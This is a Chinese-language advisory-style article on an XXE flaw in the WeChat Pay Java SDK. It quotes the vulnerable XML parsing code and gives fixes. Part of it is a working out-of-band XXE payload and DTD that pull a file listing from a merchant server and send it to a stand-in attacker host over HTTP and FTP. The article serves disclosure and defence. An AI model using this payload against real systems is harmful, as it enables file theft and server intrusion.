昨日在国外安全社区seclists有一个署名叫Rose Jackcode的白帽子公布了微信支付sdk的一个严重的安全漏洞(xxe漏洞)。攻击者可以伪造一个恶意的回调数据请求(xml格式),读取商户服务器上任意文件,甚至可以执行远程系统命令,导致商户服务器被入侵。
目前微信支付安全团队表示已对该SDK进行更新,修复了已知的安全漏洞,并在此提醒商户及时更新。
虽然微信支付官网上的sdk更新了,但是漏洞是存在于商户的网站系统中,需要商户下载最新的sdk对系统进行更新发布(或者看下面的自己修复方案)。因此目前还有大量的微信商户系统存在此漏洞,相关商户需要及时更新。
来看看该微信支付sdk漏洞如何造成的:
什么是xxe漏洞,xxe全称为XML External Entity attack,即XML外部实体漏洞。XML定义的外部实体可以载入本地或者远程的内容。
受影响版本: WxPayAPI_JAVA_v3.zip (之前版本的应该也受影响)
漏洞版本sdk中的README.md出示的例子:
String notifyData = "....";
MyConfig config = new MyConfig();
WXPay wxpay = new WXPay(config); //conver to map
Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
....
WXPayUtil里:
public static Map<String, String> xmlToMap(String strXML) throws Exception {
Map<String, String> data = new HashMap<String, String>();
DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
// 没有xxe防范
DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
InputStream stream = new ByteArrayInputStream(strXML.getBytes( "UTF-8")); org.w3c.dom.Document doc = documentBuilder.parse(stream);
...
}
如何模拟利用此漏洞:
向商家回调的url中模拟post以下xml数据:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [ <!ENTITY % attack SYSTEM "file:///etc/">
<!ENTITY % hxt SYSTEM "http://attack:8080/shell/data.dtd";>
%hxt;
]>
http://attack:8080为攻击者自己搭建的服务器,在data.dtd中写上:
<!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack; '>">
%shell;
%upload;
触发XXE攻击后,商家服务器会把/etc/的内容发送到攻击者的ftp://attack:33上。
不用最新版sdk修复方案:
方案1.
禁用外部实体,在WXPayUtil里
DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
下面加上
documentBuilderFactory.setExpandEntityReferences(false);
方案2.
过滤用户提交的XML数据
关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。